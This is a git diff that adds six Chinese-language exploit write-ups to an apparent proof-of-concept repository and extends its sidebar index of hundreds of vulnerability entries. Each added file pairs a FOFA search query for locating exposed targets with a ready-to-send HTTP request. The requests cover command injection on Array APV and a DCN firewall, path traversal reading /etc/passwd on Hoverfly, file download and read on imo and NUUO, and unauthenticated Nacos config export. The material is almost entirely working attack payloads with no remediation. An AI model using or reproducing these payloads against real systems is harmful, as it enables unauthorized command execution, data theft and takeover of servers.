diff --git "a/Array-APV/Array-APV\345\272\224\347\224\250\344\272\244\344\273\230\347\263\273\347\273\237ping_hosts\345\255\230\345\234\250\344\273\273\346\204\217\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/Array-APV/Array-APV\345\272\224\347\224\250\344\272\244\344\273\230\347\263\273\347\273\237ping_hosts\345\255\230\345\234\250\344\273\273\346\204\217\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..79f7738
--- /dev/null
+++ "b/Array-APV/Array-APV\345\272\224\347\224\250\344\272\244\344\273\230\347\263\273\347\273\237ping_hosts\345\255\230\345\234\250\344\273\273\346\204\217\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md"
@@ -0,0 +1,26 @@
+# Array-Networks-APV应用交付系统ping_hosts存在任意命令执行漏洞
+
+Array Networks APV应用交付系统 /rest/ping_hosts 接口存在远程命令执行漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。该漏洞利用难度较低,建议受影响的用户尽快修复。
+
+## fofa
+
+```javascript
+app="Array-APV" && title=="Login"
+```
+
+## poc
+
+```javascript
+POST /restapi/../rest/ping_hosts HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Connection: keep-alive
+
+["127.0.0.1| echo `whoami` received 2 3 4"]=1&csrfmiddlewaretoken=cXLnOdGshlksqOG0Ubnn4SlBvO8zOdWW
+```
+
+![image-20240913223135601](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132231693.png)
\ No newline at end of file
diff --git "a/DCN/DCN\351\230\262\347\201\253\345\242\231ping.php\345\255\230\345\234\250\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/DCN/DCN\351\230\262\347\201\253\345\242\231ping.php\345\255\230\345\234\250\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..eaf268f
--- /dev/null
+++ "b/DCN/DCN\351\230\262\347\201\253\345\242\231ping.php\345\255\230\345\234\250\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md"
@@ -0,0 +1,29 @@
+# DCN防火墙ping.php存在命令执行漏洞
+
+
+
+## fofa
+
+```javascript
+body="北京神州数码云科信息技术有限公司" && title=="Web Management"
+```
+
+## poc
+
+```javascript
+POST /function/system/tool/ping.php HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 107
+Connection: close
+Cookie: cookie
+Upgrade-Insecure-Requests: 1
+Priority: u=4
+
+dcn_test_a_967=21&dcn_test_b_967=122&dcn_test_c_967=111&dcn_test_d=_967&doing=ping&host=1;ps&proto=&count=1
+```
+
diff --git "a/Hoverfly/Hoverfly\347\263\273\347\273\237\346\216\245\345\217\243simulation\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236\345\244\215\347\216\260(CVE-2024-45388).md" "b/Hoverfly/Hoverfly\347\263\273\347\273\237\346\216\245\345\217\243simulation\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236\345\244\215\347\216\260(CVE-2024-45388).md"
new file mode 100644
index 0000000..7f8f0c4
--- /dev/null
+++ "b/Hoverfly/Hoverfly\347\263\273\347\273\237\346\216\245\345\217\243simulation\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236\345\244\215\347\216\260(CVE-2024-45388).md"
@@ -0,0 +1,25 @@
+# Hoverfly系统接口simulation任意文件读取漏洞复现(CVE-2024-45388)
+
+Hoverfly api/v2/simulation 接口存在任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。
+
+## fofa
+
+```jade
+icon_hash="1357234275"
+```
+
+## poc
+
+```javascript
+PUT /api/v2/simulation HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+
+{"data":{"pairs":[{"request":{},"response":{"bodyFile": "../../../../../../../etc/passwd","x":"aaa"}} ]},"meta":{"schemaVersion":"v5.3"}}
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409101027771.png)
\ No newline at end of file
diff --git "a/Imo\344\272\221\345\212\236\345\205\254/imo\344\272\221\345\212\236\345\205\254\345\256\244\346\216\245\345\217\243Imo_DownLoadUI.php\344\273\273\346\204\217\346\226\207\344\273\266\344\270\213\350\275\275\346\274\217\346\264\236.md" "b/Imo\344\272\221\345\212\236\345\205\254/imo\344\272\221\345\212\236\345\205\254\345\256\244\346\216\245\345\217\243Imo_DownLoadUI.php\344\273\273\346\204\217\346\226\207\344\273\266\344\270\213\350\275\275\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..e294678
--- /dev/null
+++ "b/Imo\344\272\221\345\212\236\345\205\254/imo\344\272\221\345\212\236\345\205\254\345\256\244\346\216\245\345\217\243Imo_DownLoadUI.php\344\273\273\346\204\217\346\226\207\344\273\266\344\270\213\350\275\275\346\274\217\346\264\236.md"
@@ -0,0 +1,24 @@
+# imo云办公室接口Imo_DownLoadUI.php任意文件下载漏洞
+
+imo云办公室由于 /file/Placard/upload/Imo_DownLoadUI.php 页面 filename 参数过滤不严,导致可以读取系统敏感文件
+
+## fofa
+
+```javascript
+app="IMO-云办公室"
+```
+
+## poc
+
+```javascript
+GET /file/Placard/upload/Imo_DownLoadUI.php?cid=1&uid=1&type=1&filename=/OpenPlatform/config/kdBind.php HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+Host:
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+```
+
+![imo 云办公室 Imo_DownLoadUI.php 任意文件下载漏洞](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409111031851.png)
\ No newline at end of file
diff --git "a/NUUO/NUUO\347\275\221\347\273\234\350\247\206\351\242\221\345\275\225\345\203\217\346\234\272css_parser.php\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" "b/NUUO/NUUO\347\275\221\347\273\234\350\247\206\351\242\221\345\275\225\345\203\217\346\234\272css_parser.php\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..61b8f18
--- /dev/null
+++ "b/NUUO/NUUO\347\275\221\347\273\234\350\247\206\351\242\221\345\275\225\345\203\217\346\234\272css_parser.php\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md"
@@ -0,0 +1,23 @@
+# NUUO网络视频录像机css_parser.php任意文件读取漏洞
+
+NUUO网络视频录像机 css_parser.php 存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
+
+## fofa
+
+```javascript
+body="www.nuuo.com/eHelpdesk.php"
+```
+
+## poc
+
+```javascript
+GET /css_parser.php?css=css_parser.php HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+```
+
+![image-20240911095835420](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409110958603.png)
\ No newline at end of file
diff --git "a/Nacos/Nacos\346\234\252\346\216\210\346\235\203\344\270\213\350\275\275\351\205\215\347\275\256\344\277\241\346\201\257.md" "b/Nacos/Nacos\346\234\252\346\216\210\346\235\203\344\270\213\350\275\275\351\205\215\347\275\256\344\277\241\346\201\257.md"
new file mode 100644
index 0000000..a796309
--- /dev/null
+++ "b/Nacos/Nacos\346\234\252\346\216\210\346\235\203\344\270\213\350\275\275\351\205\215\347\275\256\344\277\241\346\201\257.md"
@@ -0,0 +1,18 @@
+# Nacos未授权下载配置信息
+
+Nacos未授权下载配置信息
+
+## fofa
+
+```javascript
+icon_hash="13942501"
+```
+
+## poc
+
+```java
+GET /v1/cs/configs?export=true&group=&tenant=&appName=&ids=&dataId= HTTP/1.1
+Host:
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409191401675.png)
\ No newline at end of file
diff --git a/_sidebar.md b/_sidebar.md
index a35b515..d918d4b 100644
--- a/_sidebar.md
+++ b/_sidebar.md
@@ -1,3 +1,4 @@
+- [首页](./)
- 1Panel
- [1Panel面板最新前台RCE漏洞(CVE-2024-39911)](./1Panel/1Panel面板最新前台RCE漏洞(CVE-2024-39911).md)
- Adobe-ColdFusion
@@ -30,6 +31,8 @@
- [Apache_Solr环境变量信息泄漏漏洞(CVE-2023-50290)](./Apache/Apache_Solr环境变量信息泄漏漏洞(CVE-2023-50290).md)
- Appium-Desktop
- [Appium-Desktop-CVE-2023-2479漏洞](./Appium-Desktop/Appium-Desktop-CVE-2023-2479漏洞.md)
+- Array-APV
+ - [Array-APV应用交付系统ping_hosts存在任意命令执行漏洞](./Array-APV/Array-APV应用交付系统ping_hosts存在任意命令执行漏洞.md)
- Array-VPN
- [Array-VPN任意文件读取漏洞](./Array-VPN/Array-VPN任意文件读取漏洞.md)
- Aruba
@@ -83,6 +86,7 @@
- [D-Link_DAR-8000操作系统命令注入漏洞(CVE-2023-4542)](./D-Link/D-Link_DAR-8000操作系统命令注入漏洞(CVE-2023-4542).md)
- DCN
- [DCN有线无线智能一体化控制器WEB管理系统](./DCN/DCN有线无线智能一体化控制器WEB管理系统.md)
+ - [DCN防火墙ping.php存在命令执行漏洞](./DCN/DCN防火墙ping.php存在命令执行漏洞.md)
- dede
- [Dedecms-v5.7.111前台tags.php-SQL注入漏洞](./dede/Dedecms-v5.7.111前台tags.php-SQL注入漏洞.md)
- [DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞](./dede/DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞.md)
@@ -146,6 +150,8 @@
- [H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598)](./H3C/H3C_magic_R100路由器的UDPserver中存在命令执行漏洞(CVE-2022-34598).md)
- [H3C网络管理系统任意文件读取漏洞](./H3C/H3C网络管理系统任意文件读取漏洞.md)
- [H3C路由器userLogin.asp信息泄漏漏洞](./H3C/H3C路由器userLogin.asp信息泄漏漏洞.md)
+- Hoverfly
+ - [Hoverfly系统接口simulation任意文件读取漏洞复现(CVE-2024-45388)](./Hoverfly/Hoverfly系统接口simulation任意文件读取漏洞复现(CVE-2024-45388).md)
- HSC
- [HSC-Mailinspector-loader.php存在任意文件读取漏洞(CVE-2024-34470)](./HSC/HSC-Mailinspector-loader.php存在任意文件读取漏洞(CVE-2024-34470).md)
- HSF
@@ -157,6 +163,8 @@
- [I-Doc-View任意文件上传漏洞](./iDocView/I-Doc-View任意文件上传漏洞.md)
- [iDocView-upload接口任意文件读取](./iDocView/iDocView-upload接口任意文件读取.md)
- [IDocView_qJvqhFt接口任意文件读取](./iDocView/IDocView_qJvqhFt接口任意文件读取.md)
+- Imo云办公
+ - [imo云办公室接口Imo_DownLoadUI.php任意文件下载漏洞](./Imo云办公/imo云办公室接口Imo_DownLoadUI.php任意文件下载漏洞.md)
- IP-guard-WebServer
- [IP-guard-WebServer-远程命令执行漏洞](./IP-guard-WebServer/IP-guard-WebServer-远程命令执行漏洞.md)
- [IP-guard-WebServer存在权限绕过漏洞(QVD-2024-14103)](./IP-guard-WebServer/IP-guard-WebServer存在权限绕过漏洞(QVD-2024-14103).md)
@@ -250,6 +258,7 @@
- [mysql2原型污染漏洞(CVE-2024-21512)](./mysql2/mysql2原型污染漏洞(CVE-2024-21512).md)
- Nacos
- [Nacos任意文件读写漏洞](./Nacos/Nacos任意文件读写漏洞.md)
+ - [Nacos未授权下载配置信息](./Nacos/Nacos未授权下载配置信息.md)
- [Nacos远程代码执行漏洞](./Nacos/Nacos远程代码执行漏洞.md)
- Ncast高清智能录播系统
- [Ncast盈可视高清智能录播系统存在RCE漏洞(CVE-2024-0305)](./Ncast高清智能录播系统/Ncast盈可视高清智能录播系统存在RCE漏洞(CVE-2024-0305).md)
@@ -258,6 +267,8 @@
- [NextGen-Mirth-Connect-XStream反序列化远程代码执行漏洞(CVE-2023-43208)](./NextGen/NextGen-Mirth-Connect-XStream反序列化远程代码执行漏洞(CVE-2023-43208).md)
- Nexus
- [Nexus未授权目录穿越漏洞(CVE-2024-4956)](./Nexus/Nexus未授权目录穿越漏洞(CVE-2024-4956).md)
+- NUUO
+ - [NUUO网络视频录像机css_parser.php任意文件读取漏洞](./NUUO/NUUO网络视频录像机css_parser.php任意文件读取漏洞.md)
- O2OA
- [O2OA远程命令执行(CVE-2022-22916)](./O2OA/O2OA远程命令执行(CVE-2022-22916).md)
- OfficeWeb365
@@ -373,6 +384,8 @@
- [Tenda-FH1201存在命令注入漏洞(CVE-2024-41468)](./Tenda/Tenda-FH1201存在命令注入漏洞(CVE-2024-41468).md)
- [Tenda-FH1201存在命令注入漏洞(CVE-2024-41473)](./Tenda/Tenda-FH1201存在命令注入漏洞(CVE-2024-41473).md)
- [Tenda路由器账号密码泄露](./Tenda/Tenda路由器账号密码泄露.md)
+- thinkphp
+ - [thinkphp最新CVE-2024-44902反序列化漏洞](./thinkphp/thinkphp最新CVE-2024-44902反序列化漏洞.md)
- Typora
- [基于Typora-DOM的跨站点脚本导致远程代码执行(CVE-2023-2317)](./Typora/基于Typora-DOM的跨站点脚本导致远程代码执行(CVE-2023-2317).md)
- WAGO
@@ -437,6 +450,7 @@
- [万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749)](./万户OA/万户ezOFFICE协同管理平台getAutoCode存在SQL注入漏洞(XVE-2024-18749).md)
- [万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞](./万户OA/万户ezOFFICE协同管理平台receivefile_gd.jsp存在SQL注入漏洞.md)
- [万户ezOFFICE系统graph_include.jsp存在SQL注入漏洞](./万户OA/万户ezOFFICE系统graph_include.jsp存在SQL注入漏洞.md)
+ - [万户ezOFFICE系统接口filesendcheck_gd.jsp存在SQL注入漏洞](./万户OA/万户ezOFFICE系统接口filesendcheck_gd.jsp存在SQL注入漏洞.md)
- [万户OA-RhinoScriptEngineService命令执行漏洞](./万户OA/万户OA-RhinoScriptEngineService命令执行漏洞.md)
- [万户OA-text2Html接口存在任意文件读取漏洞](./万户OA/万户OA-text2Html接口存在任意文件读取漏洞.md)
- [万户OA-upload任意文件上传漏洞](./万户OA/万户OA-upload任意文件上传漏洞.md)
@@ -548,6 +562,7 @@
- 全程云OA
- [全程云OA-svc.asmxSQL注入漏洞](./全程云OA/全程云OA-svc.asmxSQL注入漏洞.md)
- [全程云OA__ajax.ashxSQL注入漏洞](./全程云OA/全程云OA__ajax.ashxSQL注入漏洞.md)
+ - [全程云OA接口UploadFile存在任意文件上传漏洞](./全程云OA/全程云OA接口UploadFile存在任意文件上传漏洞.md)
- 全行业小程序运营系统
- [全行业小程序运营系统接口Wxapps.php存在任意文件上传漏洞](./全行业小程序运营系统/全行业小程序运营系统接口Wxapps.php存在任意文件上传漏洞.md)
- 公众号无限回调系统
@@ -575,6 +590,16 @@
- [华夏ERPV3.3存在信息泄漏漏洞](./华夏ERP/华夏ERPV3.3存在信息泄漏漏洞.md)
- 华天动力
- [华天动力OA系统downloadWpsFile存在任意文件读取漏洞](./华天动力/华天动力OA系统downloadWpsFile存在任意文件读取漏洞.md)
+- 华望云
+ - [华望云会议管理平台checkDoubleUserNameForAdd存在SQL注入漏洞](./华望云/华望云会议管理平台checkDoubleUserNameForAdd存在SQL注入漏洞.md)
+ - [华望云会议管理平台conflog.inc存在SQL注入漏洞](./华望云/华望云会议管理平台conflog.inc存在SQL注入漏洞.md)
+ - [华望云会议管理平台confmanger.inc存在SQL注入漏洞](./华望云/华望云会议管理平台confmanger.inc存在SQL注入漏洞.md)
+ - [华望云会议管理平台deptactionlist存在SQL注入漏洞](./华望云/华望云会议管理平台deptactionlist存在SQL注入漏洞.md)
+ - [华望云会议管理平台myconflist.in存在SQL注入漏洞](./华望云/华望云会议管理平台myconflist.in存在SQL注入漏洞.md)
+ - [华望云会议管理平台recodemanger.inc存在SQL注入漏洞](./华望云/华望云会议管理平台recodemanger.inc存在SQL注入漏洞.md)
+ - [华望云会议管理平台recodemangerForUser.inc存在SQL注入漏洞](./华望云/华望云会议管理平台recodemangerForUser.inc存在SQL注入漏洞.md)
+ - [华望云会议管理平台syslog.inc存在SQL注入漏洞](./华望云/华望云会议管理平台syslog.inc存在SQL注入漏洞.md)
+ - [华望云会议管理平台useractionlist存在SQL注入漏洞](./华望云/华望云会议管理平台useractionlist存在SQL注入漏洞.md)
- 华测监测预警系统
- [华测监测预警系统接口UserEdit.aspx存在SQL注入](./华测监测预警系统/华测监测预警系统接口UserEdit.aspx存在SQL注入.md)
- 华磊科技物流
@@ -606,8 +631,16 @@
- [启明星辰天玥网络安全审计系统SQL注入漏洞](./启明星辰/启明星辰天玥网络安全审计系统SQL注入漏洞.md)
- 和丰多媒体信息发布系统
- [和丰多媒体信息发布系统QH.aspx存在文件上传漏洞](./和丰多媒体信息发布系统/和丰多媒体信息发布系统QH.aspx存在文件上传漏洞.md)
+- 哲霖机械ERP
+ - [哲霖机械ERP接口DownloadInpFile存在任意文件读取漏洞](./哲霖机械ERP/哲霖机械ERP接口DownloadInpFile存在任意文件读取漏洞.md)
+- 唯徳知识产权管理系统
+ - [唯徳知识产权管理系统DownloadFileWordTemplate接口存在文件读取漏洞](./唯徳知识产权管理系统/唯徳知识产权管理系统DownloadFileWordTemplate接口存在文件读取漏洞.md)
+ - [唯徳知识产权管理系统WSFM.asmx接口存在任意文件上传漏洞](./唯徳知识产权管理系统/唯徳知识产权管理系统WSFM.asmx接口存在任意文件上传漏洞.md)
- 商混ERP
- [商混ERP-DictionaryEdit.aspxSQL注入漏洞](./商混ERP/商混ERP-DictionaryEdit.aspxSQL注入漏洞.md)
+ - [商混ERP系统接口Operater_Action.aspx存在SQL注入漏洞](./商混ERP/商混ERP系统接口Operater_Action.aspx存在SQL注入漏洞.md)
+ - [商混ERP系统接口StockreceiveEdit.aspx存在SQL注入漏洞](./商混ERP/商混ERP系统接口StockreceiveEdit.aspx存在SQL注入漏洞.md)
+ - [商混ERP系统接口TaskCarToQueue.aspx存在SQL注入漏洞](./商混ERP/商混ERP系统接口TaskCarToQueue.aspx存在SQL注入漏洞.md)
- 喰星云-数字化餐饮服务系统
- [喰星云-数字化餐饮服务系统listuser信息泄露漏洞](./喰星云-数字化餐饮服务系统/喰星云-数字化餐饮服务系统listuser信息泄露漏洞.md)
- [喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞](./喰星云-数字化餐饮服务系统/喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞.md)
@@ -615,6 +648,8 @@
- [喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞](./喰星云-数字化餐饮服务系统/喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞.md)
- 因酷教育软件
- [因酷教育软件开源网校程序gok4任意文件上传漏洞](./因酷教育软件/因酷教育软件开源网校程序gok4任意文件上传漏洞.md)
+- 地大信息
+ - [地大信息-基础信息平台GetImg任意文件读取漏洞](./地大信息/地大信息-基础信息平台GetImg任意文件读取漏洞.md)
- 多客圈子论坛系统
- [多客圈子论坛前台SSRF漏洞](./多客圈子论坛系统/多客圈子论坛前台SSRF漏洞.md)
- [多客圈子论坛系统httpGet任意文件读取漏洞复现](./多客圈子论坛系统/多客圈子论坛系统httpGet任意文件读取漏洞复现.md)
@@ -632,6 +667,8 @@
- [大华智慧园区clientServer接口SQL注入漏洞](./大华/大华智慧园区clientServer接口SQL注入漏洞.md)
- [大华智慧园区getNewStaypointDetailQuery接口SQL注入漏洞](./大华/大华智慧园区getNewStaypointDetailQuery接口SQL注入漏洞.md)
- [大华智慧园区管理平台任意文件读取](./大华/大华智慧园区管理平台任意文件读取.md)
+ - [大华智慧园区系统updateOcx_updateCab.action存在任意文件上传漏洞](./大华/大华智慧园区系统updateOcx_updateCab.action存在任意文件上传漏洞.md)
+ - [大华智慧园区系统updateOcx_updateZip.action存在任意文件上传漏洞](./大华/大华智慧园区系统updateOcx_updateZip.action存在任意文件上传漏洞.md)
- [大华智慧园区综合管理平台-deleteFtp-远程命令执行漏洞](./大华/大华智慧园区综合管理平台-deleteFtp-远程命令执行漏洞.md)
- [大华智慧园区综合管理平台-searchJson-SQL注入漏洞](./大华/大华智慧园区综合管理平台-searchJson-SQL注入漏洞.md)
- [大华智慧园区综合管理平台-文件上传漏洞](./大华/大华智慧园区综合管理平台-文件上传漏洞.md)
@@ -742,6 +779,8 @@
- [广联达OA接口ArchiveWebService存在XML实体注入漏洞](./广联达OA/广联达OA接口ArchiveWebService存在XML实体注入漏洞.md)
- [广联达OA系统GetSSOStamp接口存在任意用户登录](./广联达OA/广联达OA系统GetSSOStamp接口存在任意用户登录.md)
- [广联达OA系统接口ConfigService.asmx存在SQL注入漏洞](./广联达OA/广联达OA系统接口ConfigService.asmx存在SQL注入漏洞.md)
+ - [广联达OA系统接口do.asmx存在任意文件写入漏洞](./广联达OA/广联达OA系统接口do.asmx存在任意文件写入漏洞.md)
+ - [广联达OA系统接口do.asmx存在任意文件读取漏洞](./广联达OA/广联达OA系统接口do.asmx存在任意文件读取漏洞.md)
- [某联达oa-后台文件上传漏洞](./广联达OA/某联达oa-后台文件上传漏洞.md)
- 建文工程管理系统
- [建文工程管理系统BusinessManger.ashx存在SQL注入漏洞](./建文工程管理系统/建文工程管理系统BusinessManger.ashx存在SQL注入漏洞.md)
@@ -765,6 +804,8 @@
- [慧学教育科技有限公司Campuswit_uploadFiles存在任意文件上传漏洞](./慧学教育科技有限公司/慧学教育科技有限公司Campuswit_uploadFiles存在任意文件上传漏洞.md)
- 懒人网址导航页
- [懒人网址导航页search.html存在SQL注入漏洞](./懒人网址导航页/懒人网址导航页search.html存在SQL注入漏洞.md)
+- 抢单刷单系统
+ - [某二开版海外抢单Shua单系统存在任意用户登录漏洞](./抢单刷单系统/某二开版海外抢单Shua单系统存在任意用户登录漏洞.md)
- 拓尔思TRS媒资管理系统
- [拓尔思TRS媒资管理系统uploadThumb存在文件上传漏洞](./拓尔思TRS媒资管理系统/拓尔思TRS媒资管理系统uploadThumb存在文件上传漏洞.md)
- 拼团零售商城系统
@@ -777,6 +818,7 @@
- [捷诚管理信息系统sql注入漏洞](./捷诚管理信息系统/捷诚管理信息系统sql注入漏洞.md)
- 数字通OA
- [数字通OA-智慧政务接口payslip存在SQL注入漏洞](./数字通OA/数字通OA-智慧政务接口payslip存在SQL注入漏洞.md)
+ - [数字通云平台智慧政务workflow存在SQL注入漏洞](./数字通OA/数字通云平台智慧政务workflow存在SQL注入漏洞.md)
- 新中新中小学智慧校园信息管理系统
- [新中新中小学智慧校园信息管理系统Upload接口存在任意文件上传漏洞](./新中新中小学智慧校园信息管理系统/新中新中小学智慧校园信息管理系统Upload接口存在任意文件上传漏洞.md)
- 新开普掌上校园服务管理平台
@@ -870,6 +912,7 @@
- [泛微E-Mobile-client.do存在命令执行漏洞](./泛微OA/泛微E-Mobile-client.do存在命令执行漏洞.md)
- [泛微E-Mobile-messageType.do存在命令执行漏洞](./泛微OA/泛微E-Mobile-messageType.do存在命令执行漏洞.md)
- [泛微E-MobileServer远程命令执行漏洞](./泛微OA/泛微E-MobileServer远程命令执行漏洞.md)
+ - [泛微E-Mobile系统接口cdnfile存在任意文件读取漏洞](./泛微OA/泛微E-Mobile系统接口cdnfile存在任意文件读取漏洞.md)
- [泛微E-Mobile系统接口installOperate.do存在SSRF漏洞](./泛微OA/泛微E-Mobile系统接口installOperate.do存在SSRF漏洞.md)
- [泛微E-office-10接口leave_record.php存在SQL注入漏洞](./泛微OA/泛微E-office-10接口leave_record.php存在SQL注入漏洞.md)
- [泛微E-Office-json_common.phpSQL注入漏洞](./泛微OA/泛微E-Office-json_common.phpSQL注入漏洞.md)
@@ -961,6 +1004,8 @@
- [满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞](./满客宝智慧食堂系统/满客宝智慧食堂系统selectUserByOrgId存在未授权访问漏洞.md)
- 潍微科技
- [潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞](./潍微科技/潍微科技-水务信息管理平台ChangePwd接口存在SQL注入漏洞.md)
+- 灵当CRM
+ - [灵当CRM系统接口getOrderList存在SQL注入漏洞](./灵当CRM/灵当CRM系统接口getOrderList存在SQL注入漏洞.md)
- 点企来客服系统
- [点企来客服系统getwaitnum存在sql注入漏洞](./点企来客服系统/点企来客服系统getwaitnum存在sql注入漏洞.md)
- 热网无线监测系统
@@ -1068,12 +1113,14 @@
- [用友U8-Cloud系统BusinessRefAction存在SQL注入漏洞](./用友OA/用友U8-Cloud系统BusinessRefAction存在SQL注入漏洞.md)
- [用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞](./用友OA/用友u8-cloud系统ESBInvokerServlet存在反序列化漏洞.md)
- [用友U8-Cloud系统XChangeServlet接口存在XXE漏洞](./用友OA/用友U8-Cloud系统XChangeServlet接口存在XXE漏洞.md)
+ - [用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞](./用友OA/用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞.md)
- [用友U8-Cloud系统接口MeasQueryConditionFrameAction存在SQL注入漏洞](./用友OA/用友U8-Cloud系统接口MeasQueryConditionFrameAction存在SQL注入漏洞.md)
- [用友U8-Cloud系统接口MultiRepChooseAction存在SQL注入漏洞](./用友OA/用友U8-Cloud系统接口MultiRepChooseAction存在SQL注入漏洞.md)
- [用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞](./用友OA/用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞.md)
- [用友U8-CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞](./用友OA/用友U8-CRM客户关系管理系统downloadfile.php存在任意文件读取漏洞.md)
- [用友U8-CRM客户关系管理系统getemaildata.php任意文件上传漏洞](./用友OA/用友U8-CRM客户关系管理系统getemaildata.php任意文件上传漏洞.md)
- [用友U8-CRM接口exportdictionary.php存在SQL注入漏洞](./用友OA/用友U8-CRM接口exportdictionary.php存在SQL注入漏洞.md)
+ - [用友U8-CRM系统chkService.php存在SQL注入漏洞](./用友OA/用友U8-CRM系统chkService.php存在SQL注入漏洞.md)
- [用友U8-CRM系统接口attrlist存在SQL注入漏洞](./用友OA/用友U8-CRM系统接口attrlist存在SQL注入漏洞.md)
- [用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞](./用友OA/用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞.md)
- [用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞](./用友OA/用友U8-nc.bs.sm.login2.RegisterServlet存在SQL注入漏洞.md)
@@ -1081,6 +1128,7 @@
- [用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞](./用友OA/用友U8cloud-ExportUfoFormatAction存在SQL注入漏洞.md)
- [用友U8cloud接口MeasureQueryByToolAction存在SQL注入漏洞](./用友OA/用友U8cloud接口MeasureQueryByToolAction存在SQL注入漏洞.md)
- [用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞](./用友OA/用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞.md)
+ - [用友U8CRM系统接口relobjreportlist.php存在SQL注入漏洞](./用友OA/用友U8CRM系统接口relobjreportlist.php存在SQL注入漏洞.md)
- [用友U8GRP-fastjson漏洞](./用友OA/用友U8GRP-fastjson漏洞.md)
- [用友U8_Cloud-base64存在SQL注入漏洞](./用友OA/用友U8_Cloud-base64存在SQL注入漏洞.md)
- [用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞](./用友OA/用友U8_cloud_KeyWordDetailReportQuery_SQL注入漏洞.md)
@@ -1155,12 +1203,14 @@
- [科荣AIO-moffice接口存在SQL注入漏洞](./科荣AIO/科荣AIO-moffice接口存在SQL注入漏洞.md)
